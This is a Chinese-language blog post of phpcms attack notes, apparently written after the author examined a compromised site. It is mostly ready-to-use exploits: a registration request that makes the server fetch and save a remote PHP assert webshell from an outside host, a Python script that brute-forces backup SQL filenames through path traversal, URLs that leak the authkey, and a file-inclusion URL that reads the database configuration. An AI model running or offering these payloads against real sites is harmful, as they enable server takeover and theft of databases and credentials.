phpcms笔记
首页 > 漏洞    作者:Iamyc   2019年2月20日 0:18 星期三   热度:1355°   百度已收录  
时间:2019-2-20 0:18   热度:1355° 

刚刚去群里顺便看到有人发了个站,被黑了,请求帮助

倒不是图个钱,这两天天天代码审计脑子估计也有点问题了,拿拿站也好

然后帮忙看了下,指纹phpcms,这。。。

然后果断拿出exp试了一发

告诉ta漏洞在哪

然后phpcms最近也没报啥很热门的漏洞,基本还是以前拿站的手法。

1、当然最优先的是直接getshell

往/index.php?m=member&c=index&a=register&siteid=1

post数据:

siteid=1&modelid=11&username=yc&password=ycycyc11!!&email=yc@lang-v.com&info[content]=<img src=http://files.hackersb.cn/webshell/antSword-shells/php_assert.php#.jpg>&dosubmit=1&protocol=

2、备份漏洞

py2的exp脚本,自救修改url即可,最后访问去下载备份/caches/bakup/default/


# coding=utf-8


import requests

import itertools

characters = "abcdefghjklmnopqrstuvwxyz0123456789_!#"

backup_sql = ""

payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"

url = "http://www.lang-v.com"#exchange this url

flag = 0

for num in range(1,7):

    if flag:

        break

    for pre in itertools.permutations(characters,num):

        pre = ''.join(list(pre))

        payload = payload.format(location=pre)

        r = requests.get(url+payload)

        if r.status_code == 200 and "PNG" in r.text:

            flag = 1

            backup_sql = pre

            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"

            break

        else:

            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"

print("[+]",backup_sql)

flag = 0

for i in range(30):

    if flag:

        break

    for ch in characters:

        if ch == characters[-1]:

            flag = 1

            break

        payload = payload.format(location=backup_sql+ch)

        r = requests.get(url + payload)

        if r.status_code == 200 and "PNG" in r.text:

            backup_sql += ch

            print("[+] ",backup_sql)

            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"

            break

        else:

            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"

print(">>",backup_sql+".sql")

3、通过authkey
两个获得authkey的exp:
/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V 
/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin 
拿到authkey之后,自己百度去。。。一搜一堆

4、文件包含exp
/index.php?m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php 



二维码加载中...
本文作者:Iamyc      文章标题: phpcms笔记
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=67
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog